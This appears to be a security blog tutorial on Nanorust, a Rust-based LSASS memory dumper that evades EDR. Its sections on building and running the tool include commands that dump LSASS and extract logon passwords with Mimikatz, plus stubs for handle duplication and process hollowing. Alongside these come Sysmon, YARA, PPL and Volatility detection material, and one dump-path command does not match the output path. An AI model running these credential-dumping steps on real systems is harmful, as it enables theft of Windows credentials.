
Introduction:
The eternal cat-and-mouse game between red team operators and endpoint detection has just escalated with Nanorust—a Rust-based rewrite of the infamous Nanodump tool that specifically targets LSASS processes where Windows credentials live. By leveraging advanced syscall obfuscation techniques including Hell’s Gate and Tartarus Gate, this tool represents a significant evolution in how attackers can bypass security monitoring to extract sensitive authentication data directly from memory.
Learning Objectives:
- Understand how Nanorust implements Hell’s Gate and Tartarus Gate syscall techniques to evade EDR hooks
- Master the handle duplication method for accessing LSASS without direct process opening
- Deploy and configure Nanorust in controlled red team environments for credential harvesting exercises
- Identify detection signatures and implement mitigation strategies against such memory dumping attacks
You Should Know:
1. Building and Deploying Nanorust on Windows Targets
Nanorust requires Rust 1.88+ and specifically targets x64 Windows systems. The build process is straightforward but requires proper environment setup:
# Install Rust if not already present (PowerShell as administrator)
winget install Rustlang.Rustup
# Verify installation
rustc --version
cargo --version
# Clone the Nanorust repository
git clone https://github.com/Hakumarachi/Nanorust.git
cd Nanorust
# Build the release version with optimizations
cargo build --release
# The compiled binary will be at .\target\release\nanorust.exe
What this does: Compiles the Nanorust memory dumping tool with full optimizations, creating a standalone executable that implements all evasion techniques.
2. Hell’s Gate and Tartarus Gate: Syscall Evasion Explained
Nanorust implements Hell’s Gate, a technique that dynamically resolves syscall numbers from ntdll.dll at runtime and issues the syscall itself, so the hooked ntdll export is never called. Here’s how to observe this behavior from the defender’s side:
# Sysmon does not record syscalls by name. What it records is Event ID 10 (ProcessAccess):
# SourceImage, TargetImage, GrantedAccess and a CallTrace for every handle opened to lsass.exe
# (requires a Sysmon config that does not exclude lsass.exe as a target).
# A direct syscall shows up as a CallTrace whose innermost frame is not inside ntdll.dll.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; ID = 10 } |
    Where-Object { $_.Message -match 'TargetImage:.*lsass\.exe' } |
    Select-Object TimeCreated, Message -First 10
# Check whether Nanorust is bypassing user-mode hooks using API Monitor:
#   download API Monitor from http://www.rohitab.com/apimonitor,
#   attach to the nanorust.exe process and filter for syscalls; a process that issues
#   its own syscalls shows none of the ntdll calls a normal dumper would.
The Tartarus Gate enhancement extends Hell’s Gate by adding indirect syscall invocation, making detection even more challenging.
3. Handle Duplication Technique for LSASS Access
One of Nanorust’s stealthiest features is handle duplication—instead of directly opening LSASS (which triggers alerts), it duplicates an existing handle:
// Conceptual C# code showing the NT API calls involved in handle duplication
// (educational stub: the enumeration and duplication logic is intentionally left out)
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

class HandleDuplicationDemo
{
    // Native structures needed by the NtOpenProcess declaration below
    [StructLayout(LayoutKind.Sequential)]
    struct OBJECT_ATTRIBUTES
    {
        public int Length;
        public IntPtr RootDirectory;
        public IntPtr ObjectName;
        public uint Attributes;
        public IntPtr SecurityDescriptor;
        public IntPtr SecurityQualityOfService;
    }

    [StructLayout(LayoutKind.Sequential)]
    struct CLIENT_ID
    {
        public IntPtr UniqueProcess;
        public IntPtr UniqueThread;
    }

    [DllImport("ntdll.dll", SetLastError = true)]
    static extern int NtOpenProcess(ref IntPtr ProcessHandle, uint AccessMask,
        ref OBJECT_ATTRIBUTES ObjectAttributes, ref CLIENT_ID ClientId);

    [DllImport("ntdll.dll", SetLastError = true)]
    static extern int NtDuplicateObject(IntPtr SourceProcessHandle,
        IntPtr SourceHandle, IntPtr TargetProcessHandle, out IntPtr TargetHandle,
        uint DesiredAccess, uint HandleAttributes, uint Options);

    // Find a process that already holds a handle to LSASS and duplicate it
    static void DuplicateLsassHandle()
    {
        // Implementation would enumerate process handles and duplicate
        // those pointing to the LSASS process ID
    }
}
4. Executing Nanorust for Credential Extraction
Once compiled, executing Nanorust requires understanding its command-line options:
# Basic execution (dumps LSASS to default location)
.\nanorust.exe
# Specify custom output file
.\nanorust.exe -o C:\temp\lsass.dmp
# Use handle duplication method specifically
.\nanorust.exe --duplicate-handle
# Combine with process injection for added stealth
.\nanorust.exe --inject --target-pid 1234
# Verify successful dump
dir C:\temp.dmp
# Analyze the dump with Mimikatz (on attacker machine)
mimikatz sekurlsa::minidump lsass.dmp
mimikatz sekurlsa::logonPasswords
5. Detecting and Mitigating Nanorust Attacks
Blue team members can implement these detection measures:
# PowerShell detection script for LSASS access anomalies
$lsass = Get-Process lsass -ErrorAction SilentlyContinue
if ($lsass) {
    # Handle access events: 4656 (handle requested) and 4663 (object accessed).
    # They are only written when "Audit Kernel Object" auditing is enabled and a SACL
    # exists; the events carry the object path (Properties[6] = ObjectName), not the target PID.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; ID = 4656, 4663 } -ErrorAction SilentlyContinue |
        Where-Object { $_.Properties[6].Value -match 'lsass\.exe' } |
        Format-Table TimeCreated, Message -AutoSize

    # Check for suspicious process creation (4688; Properties[5] = NewProcessName)
    Get-WinEvent -LogName 'Security' -FilterXPath "*[System[EventID=4688]]" -ErrorAction SilentlyContinue |
        Where-Object { $_.Properties[5].Value -match 'nanorust|lsass' } |
        Select-Object TimeCreated, Message
}

# Enable PPL (Protected Process Light) for LSASS:
# add the registry value that enables LSA Protection
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" `
    -Name "RunAsPPL" -Value 1 -PropertyType DWord -Force
# Restart for the change to take effect
This prevents non-PPL processes from opening LSASS for memory access.
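As an added example (not code from this post or from the Nanorust project) of the Sysmon-based detection described in sections 2, 3 and 5: a small Python checker over constructed Sysmon Event ID 10 messages that flags LSASS access granted with PROCESS_VM_READ, or whose call trace never enters the kernel through ntdll.dll, which is the footprint of a direct-syscall stub. The message layout, sample paths and offsets are assumptions made for the example.

```python
import re
from typing import Dict, List

PROCESS_VM_READ = 0x0010  # access right a dumper needs to read lsass memory

# Constructed Sysmon Event ID 10 (ProcessAccess) messages; sample paths and
# offsets are invented for this example, not real telemetry.
SAMPLE_EVENTS = [
    "Process accessed:\nSourceImage: C:\\Program Files\\Windows Defender\\MsMpEng.exe\n"
    "TargetImage: C:\\Windows\\System32\\lsass.exe\nGrantedAccess: 0x1000\n"
    "CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|C:\\Windows\\System32\\KERNELBASE.dll+2c2f6",
    "Process accessed:\nSourceImage: C:\\Users\\alice\\Downloads\\updater.exe\n"
    "TargetImage: C:\\Windows\\System32\\lsass.exe\nGrantedAccess: 0x1FFFFF\n"
    "CallTrace: UNKNOWN(00007FF6A1B22C10)|C:\\Users\\alice\\Downloads\\updater.exe+22c10",
    "Process accessed:\nSourceImage: C:\\Windows\\System32\\svchost.exe\n"
    "TargetImage: C:\\Windows\\System32\\spoolsv.exe\nGrantedAccess: 0x1410\n"
    "CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|C:\\Windows\\System32\\KERNELBASE.dll+2c2f6",
]

FIELD = re.compile(r"^(\w+): (.*)$", re.MULTILINE)

def parse_event(text: str) -> Dict[str, str]:
    """Turn the 'Name: value' lines of a Sysmon message into a dict."""
    return {m.group(1): m.group(2) for m in FIELD.finditer(text)}

def direct_syscall(calltrace: str) -> bool:
    """A normal Win32 call enters the kernel through ntdll.dll, so the innermost
    frame of the CallTrace should be ntdll. Any other module (or UNKNOWN) means
    the syscall instruction ran elsewhere, i.e. a Hell's Gate style direct
    syscall. Indirect syscalls that jump back into ntdll are NOT caught here."""
    first = calltrace.split("|", 1)[0]
    return "ntdll.dll" not in first.lower()

def assess(events: List[str]) -> List[Dict[str, object]]:
    """Return one finding per LSASS access that looks like a credential dump."""
    findings = []
    for ev in map(parse_event, events):
        if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            continue
        access = int(ev.get("GrantedAccess", "0x0"), 16)
        reasons = []
        if access & PROCESS_VM_READ:
            reasons.append("PROCESS_VM_READ granted on lsass.exe")
        if direct_syscall(ev.get("CallTrace", "")):
            reasons.append("call trace does not enter the kernel via ntdll.dll")
        if reasons:
            findings.append({"source": ev.get("SourceImage", "?"), "reasons": reasons})
    return findings
```

Run against exported Sysmon messages, only the Defender engine's 0x1000 query access passes cleanly; the unknown binary is flagged on both counts.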
6. Linux Cross-Compilation for Windows Targets
Security researchers can cross-compile Nanorust from Linux:
# Install the cross-compilation target
rustup target add x86_64-pc-windows-gnu
# Install MinGW for Windows linking
sudo apt install mingw-w64
# Cross-compile
cargo build --release --target x86_64-pc-windows-gnu
# The Windows executable will be at:
#   ./target/x86_64-pc-windows-gnu/release/nanorust.exe
7. Advanced Evasion: Combining with Process Hollowing
For red team exercises, Nanorust can be combined with process hollowing:
// Conceptual Rust code for process hollowing (simplified; the steps are left as comments)
use windows::Win32::System::Diagnostics::Debug::*;
use windows::Win32::System::Threading::*;
use windows::Win32::Foundation::*;

unsafe fn hollow_process(target_path: &str) -> Result<(), Box<dyn std::error::Error>> {
    // 1. Create suspended process
    // 2. Unmap original executable memory
    // 3. Allocate memory and write Nanorust payload
    // 4. Set entry point and resume thread
    let _ = target_path; // unused in this conceptual stub
    Ok(())
}
8. YARA Rules for Nanorust Detection
Create YARA rules to identify Nanorust binaries. Note that $s1, $s2 and $s5 also occur in many legitimate programs, so a hit on those alone is a lead to triage, not a verdict:
rule Nanorust_Memory_Dumper {
    meta:
        description = "Detects Nanorust LSASS memory dumper"
        author = "Security Research"
        date = "2024-01-15"
    strings:
        $s1 = "NtOpenProcess" wide ascii
        $s2 = "NtReadVirtualMemory" wide ascii
        $s3 = "Hell's Gate" wide ascii
        $s4 = "Tartarus Gate" wide ascii
        $s5 = "lsass.exe" wide ascii nocase
        $s6 = "duplicate-handle" wide ascii
    condition:
        3 of ($s*) or all of ($s1, $s2, $s5)
}
9. Memory Forensics to Detect Past Attacks
Use Volatility 3 to identify LSASS dumping artifacts:
# Install volatility3
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3
# Analyze memory dump for LSASS access
python vol.py -f memory.dump windows.cmdline.CmdLine
# Check for process handle leaks (substitute the lsass PID reported by windows.pslist.PsList)
python vol.py -f memory.dump windows.handles.Handles --pid <lsass PID>
# Look for suspicious memory sections
python vol.py -f memory.dump windows.malfind.Malfind
# Verify if LSASS was accessed by non-system processes
python vol.py -f memory.dump windows.pslist.PsList
What Undercode Say:
Key Takeaway 1: Nanorust represents a dangerous evolution in credential dumping tools by combining Rust’s performance with advanced syscall evasion techniques. Its implementation of Hell’s Gate and Tartarus Gate makes it significantly harder for traditional EDR solutions that rely on user-mode API hooking to detect malicious LSASS access.
Key Takeaway 2: The handle duplication technique is particularly concerning because it leverages legitimate process interactions—finding a process that already has a handle to LSASS and duplicating it bypasses the need to call NtOpenProcess directly, which is heavily monitored.
The shift to Rust for malware development is accelerating because it provides memory safety without garbage collection, produces smaller binaries, and offers better cross-platform capabilities. For blue teams, this means updating detection strategies to focus on abnormal memory access patterns rather than simple API call monitoring. Implementing LSA Protection (RunAsPPL), Credential Guard, and aggressive handle auditing are essential countermeasures. Organizations should also deploy Sysmon with comprehensive rule sets that flag any process attempting to read LSASS memory, regardless of how the handle was obtained. The arms race continues, and tools like Nanorust ensure that security professionals must constantly evolve their defensive strategies.
Prediction:
Within the next 6-12 months, we’ll see mainstream EDR vendors releasing signature updates specifically targeting Nanorust’s syscall patterns, followed by the emergence of Rust-based offensive toolkits that combine multiple evasion techniques (Hell’s Gate, Tartarus Gate, and Halos Gate) into unified frameworks. Simultaneously, Microsoft will likely enhance LSASS protections in Windows 12 or through cumulative updates, possibly requiring TPM-backed isolation for LSA processes. This will push attackers toward alternative credential access methods, including memory scraping of other processes and cloud authentication token theft.
Reported By: Splog Nanorust – Hackers Feeds